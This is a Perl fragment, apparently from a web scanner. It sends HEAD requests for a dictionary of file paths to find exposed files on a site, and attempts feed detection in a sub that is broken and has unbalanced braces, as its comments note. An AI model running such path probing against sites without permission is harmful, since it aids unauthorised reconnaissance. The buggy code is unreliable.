sub tempse {
print RED "\nLoading Dictionary....\n";
my $temp;
open(TEMPS, "libs/temps.txt") || die "No existe la DB!\n";
while($temp = <TEMPS>){
chomp($temp);
$tempurl = $web."/".$temp;
  $req = HTTP::Request->new(HEAD => $tempurl);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if ($res->is_success) {
print "Interesting File Found: ".$tempurl."\n";
  }
}
}

# Fetches $web once. $p is created but never used, and $html is stored
# but never parsed, so the feed/link detection in parsear() is dead code.
sub cms {
  my $p = new HTML::Parser;
  $req = HTTP::Request->new(GET => $web);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if($res->is_success) {
$html = $res->content;
# Intended start-tag handler for <link type="application/..."> (feed
# autodiscovery): "link", "application/" and "http://" are regexes here.
# It prints $rss, which is never assigned anywhere in this sub - $href,
# the absolute URL just computed, looks like the intended value.
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "link") {
$type = $attr->{"type"};
if($type =~ "application/") {
$href = $attr->{"href"};
if($href !~ "http://") { $href = "http://$host/$href";}
print "RSS: ".$rss."\n";
}
}
}

}}}